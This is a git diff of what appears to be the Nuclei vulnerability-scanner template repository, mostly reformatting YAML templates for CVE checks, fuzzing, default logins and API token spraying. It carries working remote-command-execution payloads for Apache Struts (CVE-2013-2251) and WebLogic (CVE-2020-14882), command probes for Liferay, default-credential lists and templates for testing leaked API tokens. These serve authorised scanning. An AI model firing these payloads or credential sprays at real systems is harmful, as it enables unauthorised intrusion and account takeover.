diff --git a/.nuclei-ignore b/.nuclei-ignore
index 26f85418fb..bef00b4d7a 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
-
-files:
- - "token-spray/"
-
-
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index d322c7908c..67158a4a69 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
- GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+ GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
payloads:
params:
@@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
+ condition: or
status:
- 200
- 400
- condition: or
+
- type: regex
+ part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- part: body
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 0f87ecde9f..7560cc422d 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
- attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
+ condition: and
words:
- "environment variable"
- - "display library search paths"
- condition: and
+ - "display library search paths"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml
index 163e4ead10..24cfb039e5 100644
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
- attack: sniper
+
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
words:
- "Dashboard"
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 382be20081..e36159a674 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
- cmd: §exec§
- Connection: close
+ cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- condition: or
- part: body
- type: status
status:
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index dd62e8fa68..80017aa104 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- attack: sniper
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml
index fac0befccd..20bf91e5e0 100644
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml
index 30f759b9cb..125010431f 100644
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@@ -1,4 +1,5 @@
id: grafana-default-login
+
info:
name: Grafana Default Login
author: pdteam
@@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
-
password:
- prom-operator
- admin
@@ -35,16 +35,14 @@ requests:
matchers:
- type: word
words:
- - grafana_session
+ - "grafana_session" # Login cookie
part: header
- # Check for 'grafana_session' cookie on valid login in the response header.
- type: word
- words:
- - Logged in
part: body
- # Check for valid string on valid login.
+ words:
+ - "Logged in" # Logged in keyword
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml
index aa854686cb..beada2b11a 100644
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@@ -20,15 +20,13 @@ requests:
username:
- admin
- attack: sniper
-
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
- condition: and
- type: status
status:
diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml
index 9c7aa9d12a..959da5926b 100644
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@@ -18,22 +18,21 @@ requests:
payloads:
password:
- - 12345
- attack: sniper
+ - "12345"
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "session_id="
- "resource"
- condition: and
- type: word
- words:
- - "Invalid Password"
part: body
negative: true
+ words:
+ - "Invalid Password"
- type: status
status:
diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml
index ad8ba27848..0676457b68 100644
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
- attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "- Adminer"
- - "partial(verifyVersion, "
- condition: and
+ - "partial(verifyVersion"
+
- type: status
status:
- 200
diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml
index 2fe78b348f..4eab49564e 100644
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
- Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
- attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true
diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml
index 63fd397d99..11072add7c 100644
--- a/fuzzing/prestashop-module-fuzz.yaml
+++ b/fuzzing/prestashop-module-fuzz.yaml
@@ -1,4 +1,5 @@
id: prestashop-module-fuzz
+
info:
name: Prestashop Modules Enumeration
author: meme-lord
@@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
- attack: sniper
- threads: 50
+ threads: 50
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- ""
- ""
- ""
- ""
- ""
- condition: and
- type: status
status:
diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml
index 1af3f07971..c9f21082e4 100644
--- a/fuzzing/wordpress-plugins-detect.yaml
+++ b/fuzzing/wordpress-plugins-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-plugins-detect
+
info:
name: WordPress Plugins Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml
index 9343703599..dd98af2fe3 100644
--- a/fuzzing/wordpress-themes-detect.yaml
+++ b/fuzzing/wordpress-themes-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-themes-detect
+
info:
name: WordPress Theme Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml
index 1733d4647d..a36f3f1287 100644
--- a/miscellaneous/ntlm-directories.yaml
+++ b/miscellaneous/ntlm-directories.yaml
@@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
+ threads: 50
payloads:
path:
- /
@@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
- attack: sniper
- threads: 50
-
matchers-condition: and
matchers:
- type: dsl
diff --git a/token-spray/README.md b/token-spray/README.md
index 24081b4662..4c463e5694 100644
--- a/token-spray/README.md
+++ b/token-spray/README.md
@@ -1,15 +1,19 @@
## About
+
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
-You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
-```bash
-# Run Nuclei specifying all the api templates:
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
+# Running token-spray templates against a single token to test
+nuclei -t token-spray/ -var token=random-token-to-test
+
+# Running token-spray templates against a file containing multiple new line delimited tokens
+nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
-These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
+These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
\ No newline at end of file
diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml
index 9282cf7a4d..482dc7bdd9 100644
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
+self-contained: true
requests:
- method: GET
path:
@@ -16,6 +17,6 @@ requests:
matchers:
- type: status
+ negative: true
status:
- 401
- negative: true
diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml
index 0892d85b9f..17c0d216aa 100644
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml
index 57e1d5d3d4..01c70c7974 100644
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml
index 77e8e1e677..350b8edd1b 100644
--- a/token-spray/buildkite.yaml
+++ b/token-spray/buildkite.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml
index 229da7b1d5..15d86d53fe 100644
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml
index 1d8289fb37..b54a5c8df8 100644
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml
index 281d22b656..d519f10651 100644
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml
index 403b97a349..ab73e7ea0d 100644
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml
index 29679e2b2f..339837160e 100644
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/github.yaml b/token-spray/github.yaml
index c6d1d560de..4722dfe6d3 100644
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml
index b3c459082e..ae81be1c96 100644
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml
index 0be1636139..61af504633 100644
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml
index a6b8cea46b..97aaf95d6c 100644
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml
index 480bc31fb7..31b68e98de 100644
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml
index aba6f43579..8ca7a1653f 100644
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml
index dcecba34b2..1fe4c209e8 100644
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml
index 62795ea15e..42987ebfe1 100644
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml
index 91826af391..dbba7431d5 100644
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml
index 88d1ce9ffc..a322b89967 100644
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
- matchers-condition: and
+ matchers-condition: and
matchers:
- type: word
part: body
+ negative: true
words:
- 'error'
- negative: true
+
- type: status
+ negative: true
status:
- 404
- negative: true
diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml
index d7b47585f1..f8689ae282 100644
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml
index 5f8e4d2721..171ff4b005 100644
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml
index 752d9d9814..db0dda7fab 100644
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml
index e804422ff0..9551876122 100644
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml
index 30ca3e6184..2f6cf7d464 100644
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml
index 82f33c2e1d..6b6b3cd539 100644
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml
index 2e38d6316a..6dce339499 100644
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml
index c97cfcee59..2c0853eda0 100644
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml
index 5eec3d0a53..e5e8290a6a 100644
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml
index d4a012bff2..ba4ee679ca 100644
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml
index 49d043391d..d7156a7295 100644
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml
index 273101bcc9..40b13b61ca 100644
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml
index c3683703cf..290da60328 100644
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
+self-contained: true
requests:
- method: GET
path:
@@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
+ negative: true
words:
- 'error_message'
- negative: true
diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml
index 9f08e416d5..ef81ec91e8 100644
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
+self-contained: true
requests:
- method: POST
path:
@@ -17,9 +18,9 @@ requests:
matchers:
- type: status
+ condition: or
status:
- 200
- 201
- 202
- 206
- condition: or
diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml
index 86566864f0..da95a4b12a 100644
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml
index 289546f452..dd851bee3e 100644
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml
index f64daea02e..ac527d2a1e 100644
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml
index 0c1f84d566..69da55de5d 100644
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml
index a885c5c780..dbf3c9ab35 100644
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml
index 0c937b51fa..5003f25b31 100644
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml
index d0ed434602..dcbf5b156d 100644
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml
index 9d7073e46c..d25870e279 100644
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
+self-contained: true
network:
- inputs:
